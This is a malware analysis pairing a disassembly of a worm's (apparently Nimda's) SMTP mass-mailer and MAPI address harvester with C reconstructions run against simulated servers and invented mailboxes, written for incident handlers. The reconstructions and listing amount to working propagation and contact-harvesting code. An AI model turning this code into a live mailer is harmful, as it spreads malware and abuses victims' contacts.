36175C07 lea eax, [ebp+var_43C] 36175C0D push offset asc_3617A2AC ; "\r\n" 36175C12 push eax 36175C13 call _strcat 36175C18 lea eax, [ebp+var_43C] 36175C1E push esi 36175C1F push eax 36175C20 lea eax, [ebp+var_43C] 36175C26 push eax 36175C27 push [ebp+var_4] 36175C2A call sub_361761D7 36175C2F add esp, 24h 36175C32 test eax, eax 36175C34 jz loc_36175B77 36175C3A cmp [ebp+var_43C], 32h 36175C41 jnz loc_36175B77 36175C47 lea eax, [ebp+var_43C] 36175C4D push offset SMTP_MAIL ; "MAIL FROM: <" 36175C52 push eax 36175C53 call _strcpy 36175C58 mov ebx, offset byte_3617D664 36175C5D lea eax, [ebp+var_43C] 36175C63 push ebx 36175C64 push eax 36175C65 call _strcat 36175C6A mov edi, offset 
asc_3617A328 ; ">\r\n" 36175C6F lea eax, [ebp+var_43C] 36175C75 push edi 36175C76 push eax 36175C77 call _strcat 36175C7C lea eax, [ebp+var_43C] 36175C82 push esi 36175C83 push eax 36175C84 lea eax, [ebp+var_43C] 36175C8A push eax 36175C8B push [ebp+var_4] 36175C8E call sub_361761D7 36175C93 add esp, 28h 36175C96 test eax, eax 36175C98 jz loc_36175B77 36175C9E cmp [ebp+var_43C], 32h 36175CA5 jnz loc_36175B77 36175CAB lea eax, [ebp+var_43C] 36175CB1 push offset SMTP_RCPT ; "RCPT TO: <" 36175CB6 push eax 36175CB7 call _strcpy 36175CBC push [ebp+arg_0] 36175CBF lea eax, [ebp+var_43C] 36175CC5 push eax 36175CC6 call _strcat 36175CCB lea eax, [ebp+var_43C] 36175CD1 push edi 36175CD2 push eax 36175CD3 call _strcat 36175CD8 lea eax, [ebp+var_43C] 36175CDE push esi 36175CDF push eax 36175CE0 lea eax, [ebp+var_43C] 36175CE6 push eax 36175CE7 push [ebp+var_4] 36175CEA call sub_361761D7 36175CEF add esp, 28h 36175CF2 test eax, eax 36175CF4 jz loc_36175B77 36175CFA cmp [ebp+var_43C], 32h 36175D01 jnz loc_36175B77 36175D07 lea eax, [ebp+var_43C] 36175D0D push offset SMTP_DATA ; "DATA\r\n" 36175D12 push eax 36175D13 call _strcpy 36175D18 lea eax, [ebp+var_43C] 36175D1E push esi 36175D1F push eax 36175D20 lea eax, [ebp+var_43C] 36175D26 push eax 36175D27 push [ebp+var_4] 36175D2A call sub_361761D7 36175D2F add esp, 18h 36175D32 test eax, eax 36175D34 jz loc_36175B77 36175D3A cmp [ebp+var_43C], 33h 36175D41 jnz loc_36175B77 36175D47 lea eax, [ebp+var_43C] 36175D4D push offset aFrom ; "From: <" 36175D52 push eax 36175D53 call _strcpy 36175D58 lea eax, [ebp+var_43C] 36175D5E push ebx 36175D5F push eax 36175D60 call _strcat 36175D65 lea eax, [ebp+var_43C] 36175D6B push edi 36175D6C push eax 36175D6D call _strcat 36175D72 lea eax, [ebp+var_43C] 36175D78 push offset aSubject ; "Subject: " 36175D7D push eax 36175D7E call _strcat 36175D83 lea eax, [ebp+var_63C] 36175D89 push eax 36175D8A call sub_36175F1C 36175D8F lea eax, [ebp+var_63C] 36175D95 push eax 36175D96 lea eax, [ebp+var_43C] 
36175D9C push eax 36175D9D call _strcat 36175DA2 lea eax, [ebp+var_43C] 36175DA8 push offset asc_3617A2AC ; "\r\n" 36175DAD push eax 36175DAE call _strcat 36175DB3 add esp, 34h 36175DB6 lea eax, [ebp+var_43C] 36175DBC push 3Ch 36175DBE push eax 36175DBF call _strlen 36175DC4 pop ecx 36175DC5 push eax 36175DC6 lea eax, [ebp+var_43C] 36175DCC push eax 36175DCD push [ebp+var_4] 36175DD0 call sub_361762B6 36175DD5 add esp, 10h 36175DD8 test eax, eax 36175DDA jz loc_36175B77 36175DE0 xor edi, edi 36175DE2 push edi 36175DE3 push edi 36175DE4 push 3 36175DE6 push edi 36175DE7 push 7 36175DE9 push 80000000h 36175DEE push offset byte_3617C8B8 36175DF3 call ds:CreateFileA 36175DF9 mov ebx, eax 36175DFB cmp ebx, 0FFFFFFFFh 36175DFE mov [ebp+arg_0], ebx 36175E01 jz loc_36175B77 36175E07 push edi 36175E08 push ebx 36175E09 call ds:GetFileSize 36175E0F cmp eax, 0FFFFFFFFh 36175E12 mov [ebp+var_8], eax 36175E15 jnz short loc_36175E23 36175E17 push ebx 36175E18 36175E18 loc_36175E18: ; CODE XREF: sub_36175AA9+395j 36175E18 call ds:CloseHandle 36175E1E jmp loc_36175B77 36175E23 ; ─────────────────────────────────────────────────────────────────────────── 36175E23 36175E23 loc_36175E23: ; CODE XREF: sub_36175AA9+36Cj 36175E23 add eax, 10h 36175E26 push eax 36175E27 push 8 36175E29 push dword_3617ACB4 36175E2F call dword_3617AC74 36175E35 mov ebx, eax 36175E37 cmp ebx, edi 36175E39 jnz short loc_36175E40 36175E3B push [ebp+arg_0] 36175E3E jmp short loc_36175E18 36175E40 ; ─────────────────────────────────────────────────────────────────────────── 36175E40 36175E40 loc_36175E40: ; CODE XREF: sub_36175AA9+390j 36175E40 lea eax, [ebp+var_10] 36175E43 push edi 36175E44 push eax 36175E45 mov [ebp+var_10], edi 36175E48 push [ebp+var_8] 36175E4B push ebx 36175E4C push [ebp+arg_0] 36175E4F call ds:ReadFile 36175E55 push [ebp+arg_0] 36175E58 test eax, eax 36175E5A jnz short loc_36175E75 36175E5C call ds:CloseHandle 36175E62 push ebx 36175E63 push edi 36175E64 push dword_3617ACB4 36175E6A 
36175E6A loc_36175E6A: ; CODE XREF: sub_36175AA9+3EDj 36175E6A call dword_3617AC70 36175E70 jmp loc_36175B77 36175E75 ; ─────────────────────────────────────────────────────────────────────────── 36175E75 36175E75 loc_36175E75: ; CODE XREF: sub_36175AA9+3B1j 36175E75 call ds:CloseHandle 36175E7B push 3Ch 36175E7D push [ebp+var_8] 36175E80 push ebx 36175E81 push [ebp+var_4] 36175E84 call sub_361762B6 36175E89 add esp, 10h 36175E8C test eax, eax 36175E8E push ebx 36175E8F push edi 36175E90 push dword_3617ACB4 36175E96 jz short loc_36175E6A 36175E98 call dword_3617AC70 36175E9E lea eax, [ebp+var_43C] 36175EA4 push offset a__0 ; ".\r\n" 36175EA9 push eax 36175EAA call _strcpy 36175EAF lea eax, [ebp+var_43C] 36175EB5 push esi 36175EB6 push eax 36175EB7 lea eax, [ebp+var_43C] 36175EBD push eax 36175EBE push [ebp+var_4] 36175EC1 call sub_361761D7 36175EC6 add esp, 18h 36175EC9 test eax, eax 36175ECB jz loc_36175B77 36175ED1 cmp [ebp+var_43C], 32h 36175ED8 jnz loc_36175B77 36175EDE lea eax, [ebp+var_43C] 36175EE4 push offset SMTP_QUIT ; "QUIT\r\n" 36175EE9 push eax 36175EEA call _strcpy 36175EEF lea eax, [ebp+var_43C] 36175EF5 push esi 36175EF6 push eax 36175EF7 lea eax, [ebp+var_43C] 36175EFD push eax 36175EFE push [ebp+var_4] 36175F01 call sub_361761D7 36175F06 add esp, 18h 36175F09 push 1 36175F0B pop esi 36175F0C 36175F0C loc_36175F0C: ; CODE XREF: sub_36175AA9+D0j 36175F0C push [ebp+var_4] 36175F0F call dword_3617AC3C 36175F15 mov eax, esi 36175F17 36175F17 loc_36175F17: ; CODE XREF: sub_36175AA9+B1j 36175F17 pop edi 36175F18 pop esi 36175F19 pop ebx 36175F1A leave 36175F1B retn 36175F1B sub_36175AA9 endp 36175F1B 36175F1C 36175F1C ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36175F1C 36175F1C 36175F1C sub_36175F1C proc near ; CODE XREF: sub_36175AA9+2E1p 36175F1C 36175F1C arg_0 = dword ptr 4 36175F1C 36175F1C mov eax, dword_3617D704 36175F21 push esi 36175F22 test eax, eax 36175F24 jz short loc_36175F2F 36175F26 cmp dword ptr 
[eax+100h], 0 36175F2D jnz short loc_36175F5D 36175F2F 36175F2F loc_36175F2F: ; CODE XREF: sub_36175F1C+8j 36175F2F call sub_36171A7B 36175F34 mov esi, offset byte_3617A818 36175F39 push 2Eh 36175F3B push esi 36175F3C call ds:strchr 36175F42 pop ecx 36175F43 test eax, eax 36175F45 pop ecx 36175F46 jz short loc_36175F4B 36175F48 and byte ptr [eax], 0 36175F4B 36175F4B loc_36175F4B: ; CODE XREF: sub_36175F1C+2Aj 36175F4B push 0FFh 36175F50 push esi 36175F51 push [esp+0Ch+arg_0] 36175F55 call ds:strncat 36175F5B jmp short loc_36175F9D 36175F5D ; ─────────────────────────────────────────────────────────────────────────── 36175F5D 36175F5D loc_36175F5D: ; CODE XREF: sub_36175F1C+11j 36175F5D call ds:rand 36175F63 imul eax, 64h 36175F66 cdq 36175F67 mov ecx, 7FFFh 36175F6C idiv ecx 36175F6E mov ecx, dword_3617D704 36175F74 36175F74 loc_36175F74: ; CODE XREF: sub_36175F1C+5Cj 36175F74 ; sub_36175F1C+6Fj 36175F74 test ecx, ecx 36175F76 mov edx, ecx 36175F78 jz short loc_36175F74 36175F7A 36175F7A loc_36175F7A: ; CODE XREF: sub_36175F1C+6Dj 36175F7A mov esi, eax 36175F7C dec eax 36175F7D test esi, esi 36175F7F jl short loc_36175F8D 36175F81 mov edx, [edx+100h] 36175F87 test edx, edx 36175F89 jnz short loc_36175F7A 36175F8B jmp short loc_36175F74 36175F8D ; ─────────────────────────────────────────────────────────────────────────── 36175F8D 36175F8D loc_36175F8D: ; CODE XREF: sub_36175F1C+63j 36175F8D push 100h 36175F92 push edx 36175F93 push [esp+0Ch+arg_0] 36175F97 call ds:strncpy 36175F9D 36175F9D loc_36175F9D: ; CODE XREF: sub_36175F1C+3Fj 36175F9D add esp, 0Ch 36175FA0 push 1 36175FA2 pop eax 36175FA3 pop esi 36175FA4 retn 36175FA4 sub_36175F1C endp 36175FA4 36175FA5 36175FA5 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36175FA5 36175FA5 ; Attributes: bp-based frame 36175FA5 36175FA5 sub_36175FA5 proc near ; CODE XREF: sub_3617558B+62p 36175FA5 36175FA5 var_208 = byte ptr -208h 36175FA5 var_8 = dword ptr -8 36175FA5 var_4 = dword ptr -4 
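Added reconstruction, in C, of the mailer routine above (sub_36175AA9) and of the three transport helpers it calls further down, sub_36176215 (recv() until the last byte read is '\n'), sub_361762B6 (send() until everything is out) and sub_361761D7 (send a command, then read the reply into the same buffer). This is written for this edit, not code from the worm or from the debugger listing. Reading the constants in the listing, the indirect calls through dword_3617AC5C / AC18 / AC58 / AC38 / AC40 / AC50 / AC48 / AC3C behave as socket(2,1,0), ioctlsocket with FIONBIO (0x8004667E), connect, htons(0x19) for port 25, select with the 0x3C second timeout, recv, send and closesocket; that identification is an inference, the import table is not on the page. The socket is replaced by an in-memory transcript so the block runs offline (sim_sock, OK_SERVER and REJECT_SERVER are invented names), and the host, addresses and body are made up. What the reconstruction makes obvious is how little the worm verifies: only the first digit of each reply, and the reply buffer is never NUL-terminated.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the worm's socket: scripted server replies handed
 * back in small pieces, plus a capture of what the client sends. */
typedef struct {
    const char *server; size_t srv_pos, chunk;   /* chunk: max bytes per recv() */
    char sent[2048];    size_t sent_len;
} sim_sock;

static int sim_recv(sim_sock *s, char *buf, int len) {
    size_t left = strlen(s->server) - s->srv_pos, n, i;
    if (left == 0 || len <= 0) return 0;                  /* peer closed, or no room */
    n = left < s->chunk ? left : s->chunk; if (n > (size_t)len) n = (size_t)len;
    for (i = 0; i < n; i++)                                /* a reply never straddles two recv()s */
        if (s->server[s->srv_pos + i] == '\n') { n = i + 1; break; }
    memcpy(buf, s->server + s->srv_pos, n);
    s->srv_pos += n;
    return (int)n;
}
static int sim_send(sim_sock *s, const char *buf, int len) {
    if (len < 0 || s->sent_len + (size_t)len >= sizeof s->sent) return -1;
    memcpy(s->sent + s->sent_len, buf, (size_t)len);
    s->sent_len += (size_t)len; s->sent[s->sent_len] = '\0';
    return len;
}
/* sub_36176215: recv() into buf+got with room max-got-1 until the last byte is '\n';
 * a 0 or SOCKET_ERROR from select()/recv() fails the call. */
static int recv_line(sim_sock *s, char *buf, int max) {
    int got = 0, n;
    buf[0] = '\0';
    for (;;) {
        if ((n = sim_recv(s, buf + got, max - got - 1)) <= 0) return 0;
        got += n;
        if (buf[got - 1] == '\n') break;
    }
    buf[got] = '\0';   /* the worm never terminates here; its callers only test buf[0] */
    return 1;
}
/* sub_361762B6: send() until every byte is out. */
static int send_all(sim_sock *s, const char *buf, int len) {
    int done = 0, n;
    while (done < len) {
        if ((n = sim_send(s, buf + done, len - done)) <= 0) return 0;
        done += n;
    }
    return 1;
}
/* sub_361761D7: send one command, then read the reply into the same buffer. */
static int cmd(sim_sock *s, char *buf, int max) {
    return send_all(s, buf, (int)strlen(buf)) && recv_line(s, buf, max);
}

/* Dialogue half of sub_36175AA9 (after gethostbyname() of the part after '@',
 * socket(), the FIONBIO dance and connect() to port 25). Replies are judged on
 * their first digit only: '2' after banner/HELO/MAIL/RCPT/".", '3' after DATA. */
int nimda_smtp_session(sim_sock *s, const char *helo, const char *from, const char *rcpt,
                       const char *subject, const char *msg, int msg_len) {
    char buf[0x400];                                        /* var_43C, 1024 bytes */
    if (!recv_line(s, buf, sizeof buf) || buf[0] != '2') return 0;
    snprintf(buf, sizeof buf, "HELO %s\r\n", helo);         /* GetComputerNameA() */
    if (!cmd(s, buf, sizeof buf) || buf[0] != '2') return 0;
    snprintf(buf, sizeof buf, "MAIL FROM: <%s>\r\n", from); /* byte_3617D664 */
    if (!cmd(s, buf, sizeof buf) || buf[0] != '2') return 0;
    snprintf(buf, sizeof buf, "RCPT TO: <%s>\r\n", rcpt);   /* arg_0 */
    if (!cmd(s, buf, sizeof buf) || buf[0] != '2') return 0;
    strcpy(buf, "DATA\r\n"); if (!cmd(s, buf, sizeof buf) || buf[0] != '3') return 0;
    /* Two forged headers, then the prebuilt file byte_3617C8B8 as raw bytes; no reply
     * is read for either, so that file must carry the remaining headers and blank line. */
    snprintf(buf, sizeof buf, "From: <%s>\r\nSubject: %s\r\n", from, subject);
    if (!send_all(s, buf, (int)strlen(buf)) || !send_all(s, msg, msg_len)) return 0;
    strcpy(buf, ".\r\n"); if (!cmd(s, buf, sizeof buf) || buf[0] != '2') return 0;
    strcpy(buf, "QUIT\r\n"); cmd(s, buf, sizeof buf);       /* reply ignored */
    return 1;
}

/* Constructed server scripts: one accepts, one refuses the recipient. */
static const char OK_SERVER[] = "220 mx.example.test ESMTP\r\n250 mx.example.test\r\n250 sender ok\r\n"
    "250 recipient ok\r\n354 end data with .\r\n250 queued\r\n221 bye\r\n";
static const char REJECT_SERVER[] = "220 mx.example.test ESMTP\r\n250 mx.example.test\r\n"
    "250 sender ok\r\n550 no such user\r\n";

/* Runs one scripted session with 5-byte recv()s; returns 1 if the client did what the
 * listing predicts: the full sequence on OK_SERVER, an abort before DATA on REJECT_SERVER. */
int nimda_smtp_demo(int reject) {
    static const char mime[] = "MIME-Version: 1.0\r\n\r\n<readme.exe goes here>\r\n";
    static const char expect[] = "HELO VICTIM-PC\r\nMAIL FROM: <harvested@example.test>\r\n"
        "RCPT TO: <target@example.test>\r\nDATA\r\nFrom: <harvested@example.test>\r\nSubject: readme\r\n"
        "MIME-Version: 1.0\r\n\r\n<readme.exe goes here>\r\n.\r\nQUIT\r\n";
    sim_sock s = { reject ? REJECT_SERVER : OK_SERVER, 0, 5, {0}, 0 };
    int ok = nimda_smtp_session(&s, "VICTIM-PC", "harvested@example.test",
                                "target@example.test", "readme", mime, (int)sizeof mime - 1);
    if (reject)
        return ok == 0 && strstr(s.sent, "RCPT TO: <target@example.test>\r\n") != NULL
               && strstr(s.sent, "DATA") == NULL;
    return ok == 1 && strcmp(s.sent, expect) == 0;
}

int main(void) {
    printf("accepting server: %d, rejecting server: %d\n", nimda_smtp_demo(0), nimda_smtp_demo(1));
    return 0;
}
```

Because the reply check is a single character compare, any 2xx or 3xx line satisfies the worm, and a server that answers slowly simply costs it the 60 second select() timeout per step; that is also why an SMTP honeypot that answers "250" to everything sees the complete message body.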
36175FA5 36175FA5 push ebp 36175FA6 mov ebp, esp 36175FA8 sub esp, 208h 36175FAE push edi 36175FAF lea eax, [ebp+var_8] 36175FB2 xor edi, edi 36175FB4 push eax 36175FB5 push edi 36175FB6 push 2 36175FB8 push edi 36175FB9 push offset aAabbcc ; "aabbcc" 36175FBE push edi 36175FBF mov [ebp+var_8], edi 36175FC2 call dword_3617D6FC 36175FC8 test eax, eax 36175FCA jz short loc_36175FD3 36175FCC xor eax, eax 36175FCE jmp loc_3617613B 36175FD3 ; ─────────────────────────────────────────────────────────────────────────── 36175FD3 36175FD3 loc_36175FD3: ; CODE XREF: sub_36175FA5+25j 36175FD3 lea eax, [ebp+var_208] 36175FD9 and [ebp+var_208], 0 36175FE0 push eax 36175FE1 push edi 36175FE2 lea eax, [ebp+var_208] 36175FE8 push 4000h 36175FED push eax 36175FEE push edi 36175FEF push edi 36175FF0 push [ebp+var_8] 36175FF3 call dword_3617D6F4 36175FF9 test eax, eax 36175FFB jnz loc_3617612C 36176001 push ebx 36176002 push esi 36176003 36176003 loc_36176003: ; CODE XREF: sub_36175FA5+17Fj 36176003 lea eax, [ebp+var_4] 36176006 push eax 36176007 push 800h 3617600C lea eax, [ebp+var_208] 36176012 push edi 36176013 push eax 36176014 push edi 36176015 push [ebp+var_8] 36176018 call dword_3617D6F0 3617601E test eax, eax 36176020 jnz loc_361760F7 36176026 mov eax, [ebp+var_4] 36176029 cmp eax, edi 3617602B jz loc_361760F7 36176031 mov eax, [eax+4] 36176034 cmp eax, edi 36176036 jz short loc_3617603F 36176038 push eax 36176039 call sub_3617613E 3617603E pop ecx 3617603F 3617603F loc_3617603F: ; CODE XREF: sub_36175FA5+91j 3617603F mov eax, [ebp+var_4] 36176042 mov eax, [eax+1Ch] 36176045 cmp eax, edi 36176047 jz short loc_36176083 36176049 mov esi, [eax+0Ch] 3617604C cmp esi, edi 3617604E jz short loc_36176083 36176050 push esi 36176051 call _strlen 36176056 cmp eax, 6 36176059 pop ecx 3617605A jbe short loc_36176083 3617605C cmp byte ptr [esi], 53h 3617605F jnz short loc_36176083 36176061 cmp byte ptr [esi+1], 4Dh 36176065 jnz short loc_36176083 36176067 cmp byte ptr [esi+2], 54h 
3617606B jnz short loc_36176083 3617606D cmp byte ptr [esi+3], 50h 36176071 jnz short loc_36176083 36176073 cmp byte ptr [esi+4], 3Ah 36176077 jnz short loc_36176083 36176079 add esi, 5 3617607C push esi 3617607D call sub_36175919 36176082 pop ecx 36176083 36176083 loc_36176083: ; CODE XREF: sub_36175FA5+A2j 36176083 ; sub_36175FA5+A9j ... 36176083 mov ecx, [ebp+var_4] 36176086 xor ebx, ebx 36176088 mov eax, [ecx+24h] 3617608B cmp eax, edi 3617608D jz short loc_361760F7 3617608F 3617608F loc_3617608F: ; CODE XREF: sub_36175FA5+14Ej 3617608F cmp ebx, [ecx+20h] 36176092 jnb short loc_361760F5 36176094 add eax, edi 36176096 test eax, eax 36176098 jz short loc_361760E7 3617609A mov esi, [eax+0Ch] 3617609D test esi, esi 3617609F jz short loc_361760E7 361760A1 push esi 361760A2 call _strlen 361760A7 cmp eax, 6 361760AA pop ecx 361760AB jbe short loc_361760E7 361760AD cmp byte ptr [esi], 53h 361760B0 jnz short loc_361760E7 361760B2 cmp byte ptr [esi+1], 4Dh 361760B6 jnz short loc_361760E7 361760B8 cmp byte ptr [esi+2], 54h 361760BC jnz short loc_361760E7 361760BE cmp byte ptr [esi+3], 50h 361760C2 jnz short loc_361760E7 361760C4 cmp byte ptr [esi+4], 3Ah 361760C8 jnz short loc_361760E7 361760CA add esi, 5 361760CD push esi 361760CE call sub_36175919 361760D3 push 80h 361760D8 push esi 361760D9 push offset byte_3617D664 361760DE call ds:strncpy 361760E4 add esp, 10h 361760E7 361760E7 loc_361760E7: ; CODE XREF: sub_36175FA5+F3j 361760E7 ; sub_36175FA5+FAj ... 361760E7 mov ecx, [ebp+var_4] 361760EA inc ebx 361760EB add edi, 18h 361760EE mov eax, [ecx+24h] 361760F1 test eax, eax 361760F3 jnz short loc_3617608F 361760F5 361760F5 loc_361760F5: ; CODE XREF: sub_36175FA5+EDj 361760F5 xor edi, edi 361760F7 361760F7 loc_361760F7: ; CODE XREF: sub_36175FA5+7Bj 361760F7 ; sub_36175FA5+86j ... 
361760F7 push [ebp+var_4] 361760FA call dword_3617D6EC 36176100 lea eax, [ebp+var_208] 36176106 mov [ebp+var_4], edi 36176109 push eax 3617610A push edi 3617610B lea eax, [ebp+var_208] 36176111 push 4000h 36176116 push eax 36176117 push edi 36176118 push edi 36176119 push [ebp+var_8] 3617611C call dword_3617D6F4 36176122 test eax, eax 36176124 jz loc_36176003 3617612A pop esi 3617612B pop ebx 3617612C 3617612C loc_3617612C: ; CODE XREF: sub_36175FA5+56j 3617612C push edi 3617612D push edi 3617612E push edi 3617612F push [ebp+var_8] 36176132 call dword_3617D6E4 36176138 push 1 3617613A pop eax 3617613B 3617613B loc_3617613B: ; CODE XREF: sub_36175FA5+29j 3617613B pop edi 3617613C leave 3617613D retn 3617613D sub_36175FA5 endp 3617613D 3617613E 3617613E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617613E 3617613E ; Attributes: bp-based frame 3617613E 3617613E sub_3617613E proc near ; CODE XREF: sub_36175FA5+94p 3617613E 3617613E var_100 = byte ptr -100h 3617613E var_1 = byte ptr -1 3617613E arg_0 = dword ptr 8 3617613E 3617613E push ebp 3617613F mov ebp, esp 36176141 sub esp, 100h 36176147 cmp [ebp+arg_0], 0 3617614B push esi 3617614C mov esi, dword_3617D704 36176152 push edi 36176153 jz short loc_361761D1 36176155 mov edi, ds:strncpy 3617615B push 0FFh 36176160 push [ebp+arg_0] 36176163 lea eax, [ebp+var_100] 36176169 push eax 3617616A call edi ; strncpy 3617616C add esp, 0Ch 3617616F and [ebp+var_1], 0 36176173 36176173 loc_36176173: ; CODE XREF: sub_3617613E+52j 36176173 test esi, esi 36176175 jz short loc_36176192 36176177 lea eax, [ebp+var_100] 3617617D push esi 3617617E push eax 3617617F call _strcmp 36176184 pop ecx 36176185 test eax, eax 36176187 pop ecx 36176188 jz short loc_361761D1 3617618A mov esi, [esi+100h] 36176190 jmp short loc_36176173 36176192 ; ─────────────────────────────────────────────────────────────────────────── 36176192 36176192 loc_36176192: ; CODE XREF: sub_3617613E+37j 36176192 push 104h 36176197 push 8 
36176199 push dword_3617ACB4 3617619F call dword_3617AC74 361761A5 test eax, eax 361761A7 jz short loc_361761D1 361761A9 mov ecx, dword_3617D704 361761AF push 100h 361761B4 mov [eax+100h], ecx 361761BA lea ecx, [ebp+var_100] 361761C0 push ecx 361761C1 push eax 361761C2 mov dword_3617D704, eax 361761C7 call edi ; strncpy 361761C9 add esp, 0Ch 361761CC push 1 361761CE pop eax 361761CF jmp short loc_361761D3 361761D1 ; ─────────────────────────────────────────────────────────────────────────── 361761D1 361761D1 loc_361761D1: ; CODE XREF: sub_3617613E+15j 361761D1 ; sub_3617613E+4Aj ... 361761D1 xor eax, eax 361761D3 361761D3 loc_361761D3: ; CODE XREF: sub_3617613E+91j 361761D3 pop edi 361761D4 pop esi 361761D5 leave 361761D6 retn 361761D6 sub_3617613E endp 361761D6 361761D7 361761D7 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 361761D7 361761D7 ; Attributes: bp-based frame 361761D7 361761D7 sub_361761D7 proc near ; CODE XREF: sub_36175AA9+181p 361761D7 ; sub_36175AA9+1E5p ... 
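Added reconstruction (written for this edit, not from the page) of how the two lists the mailer draws on get filled. Reading the constants in sub_36175FA5 above, the calls through dword_3617D6FC / D6F4 / D6F0 / D6EC / D6E4 are MAPILogon with profile "aabbcc" and flag 2 (MAPI_NEW_SESSION), MAPIFindNext with 0x4000 (MAPI_LONG_MSGID), MAPIReadMail with 0x800 (MAPI_SUPPRESS_ATTACH), MAPIFreeBuffer and MAPILogoff, and the offsets it dereferences match MapiMessage (lpszSubject at +4, lpOriginator at +0x1C, nRecipCount at +0x20, lpRecips at +0x24) and MapiRecipDesc (0x18 bytes each, lpszAddress at +0xC); that mapping is my inference from the constants. The block implements the per-message step, the validation in sub_36175919 and sub_3617613E, and the random selection in sub_361759E8 / sub_36175F1C, on constructed mailbox data (the names, addresses and subjects are invented, and the struct and function names are mine).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* The two lists: a fixed-size string followed by a next pointer, allocated with
 * HeapAlloc(hHeap, HEAP_ZERO_MEMORY, 0x84 / 0x104) and pushed at the head. */
typedef struct addr_node { char s[0x80];  struct addr_node *next; } addr_node;  /* dword_3617D700 */
typedef struct subj_node { char s[0x100]; struct subj_node *next; } subj_node;  /* dword_3617D704 */
static addr_node *g_addrs;
static subj_node *g_subjects;
static char       g_from[0x80];   /* byte_3617D664, what goes into MAIL FROM */

void nimda_reset(void) {
    while (g_addrs)    { addr_node *n = g_addrs;    g_addrs    = n->next; free(n); }
    while (g_subjects) { subj_node *n = g_subjects; g_subjects = n->next; free(n); }
    g_from[0] = '\0';
}

/* sub_36175919: lower-case, length >= 3, an '@' that is neither the first nor
 * the last byte, not already listed. Returns 1 if a node was added. */
int nimda_add_address(const char *in) {
    char tmp[0x80]; addr_node *n; size_t len, i;
    if (!in) return 0;
    strncpy(tmp, in, sizeof tmp - 1);
    tmp[sizeof tmp - 1] = '\0';                 /* the worm's strncpy(.., 0x80) may leave none */
    for (i = 0; tmp[i]; i++) tmp[i] = (char)tolower((unsigned char)tmp[i]);   /* _strlwr */
    len = strlen(tmp);
    if (len < 3 || !strchr(tmp, '@') || tmp[0] == '@' || tmp[len - 1] == '@') return 0;
    for (n = g_addrs; n; n = n->next) if (strcmp(tmp, n->s) == 0) return 0;
    if (!(n = calloc(1, sizeof *n))) return 0;
    strcpy(n->s, tmp);
    n->next = g_addrs; g_addrs = n;
    return 1;
}
/* sub_3617613E: subjects are kept as given (255 bytes max), duplicates dropped. */
int nimda_add_subject(const char *in) {
    subj_node *n;
    if (!in) return 0;
    for (n = g_subjects; n; n = n->next) if (strcmp(in, n->s) == 0) return 0;
    if (!(n = calloc(1, sizeof *n))) return 0;
    strncpy(n->s, in, 0xFF);
    n->next = g_subjects; g_subjects = n;
    return 1;
}

/* Only the MapiRecipDesc / MapiMessage fields sub_36175FA5 reads. */
typedef struct { const char *name, *address; } recip;
typedef struct { const char *subject; const recip *originator;
                 unsigned nrecips; const recip *recips; } message;

/* Per-message body of sub_36175FA5. An address counts only if it is longer than
 * 6 bytes and starts with "SMTP:"; the rest is listed, and the last qualifying
 * recipient is also copied, case untouched, into byte_3617D664. */
void nimda_harvest(const message *m) {
    unsigned i;
    const char *a = m->originator ? m->originator->address : NULL;
    nimda_add_subject(m->subject);
    if (a && strlen(a) > 6 && strncmp(a, "SMTP:", 5) == 0) nimda_add_address(a + 5);
    for (i = 0; m->recips && i < m->nrecips; i++) {
        a = m->recips[i].address;
        if (!a || strlen(a) <= 6 || strncmp(a, "SMTP:", 5) != 0) continue;
        nimda_add_address(a + 5);
        strncpy(g_from, a + 5, sizeof g_from - 1);
    }
}

/* sub_361759E8 / sub_36175F1C: MSVCRT rand() is 15-bit, so rand()*100/0x7FFF is
 * 0..100; the list is walked that many steps plus one, wrapping to the head.
 * The original spins forever on an empty list; this returns NULL instead. */
int nimda_roll(void) { return (rand() & 0x7FFF) * 100 / 0x7FFF; }
const char *nimda_pick_address(int roll) {
    const addr_node *cur = g_addrs;
    if (!cur) return NULL;
    while (roll-- >= 0) cur = cur->next ? cur->next : g_addrs;
    return cur->s;
}
/* With fewer than two subjects the worm uses a file name (byte_3617A818) cut at its first '.'. */
const char *nimda_pick_subject(int roll, const char *fallback_file) {
    static char out[0x100]; char *dot;
    const subj_node *cur = g_subjects;
    if (!cur || !cur->next) {
        snprintf(out, sizeof out, "%s", fallback_file);
        if ((dot = strchr(out, '.')) != NULL) *dot = '\0';
        return out;
    }
    while (roll-- >= 0) cur = cur->next ? cur->next : g_subjects;
    snprintf(out, sizeof out, "%s", cur->s);
    return out;
}

/* Constructed mailbox contents standing in for two MAPIReadMail() results. */
int nimda_harvest_demo(void) {
    static const recip orig = { "Alice", "SMTP:Alice@Example.test" };
    static const recip rcpts[3] = {
        { "Bob",    "SMTP:bob@example.test" },
        { "Legacy", "X400:c=us;a= ;p=corp;s=legacy" },   /* no SMTP: prefix, skipped */
        { "Alice",  "SMTP:Alice@example.test" } };      /* duplicate, but becomes g_from */
    static const message msgs[2] = { { "Quarterly numbers", &orig,      3, rcpts },
                                     { "Quarterly numbers", &rcpts[0], 0, NULL  } };
    int i, n_addr = 0, n_subj = 0;
    const addr_node *a; const subj_node *s;
    nimda_reset();
    for (i = 0; i < 2; i++) nimda_harvest(&msgs[i]);
    for (a = g_addrs; a; a = a->next) n_addr++;
    for (s = g_subjects; s; s = s->next) n_subj++;
    return n_addr == 2 && n_subj == 1 && strcmp(g_from, "Alice@example.test") == 0;
}

int main(void) {
    int ok = nimda_harvest_demo(); const addr_node *a;
    printf("demo=%d MAIL FROM: <%s> Subject: %s\n", ok, g_from,
           nimda_pick_subject(nimda_roll(), "budget.xls"));
    for (a = g_addrs; a; a = a->next) printf("RCPT TO: <%s>\n", a->s);
    return 0;
}
```

Two consequences for incident handlers follow directly from the listing: the forged sender is a real correspondent taken from the victim's own mailbox (so bounces and complaints land on an innocent third party), and a subject line that is a bare file name with its extension cut off is what the fallback in sub_36175F1C produces when the mailbox yielded fewer than two subjects.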
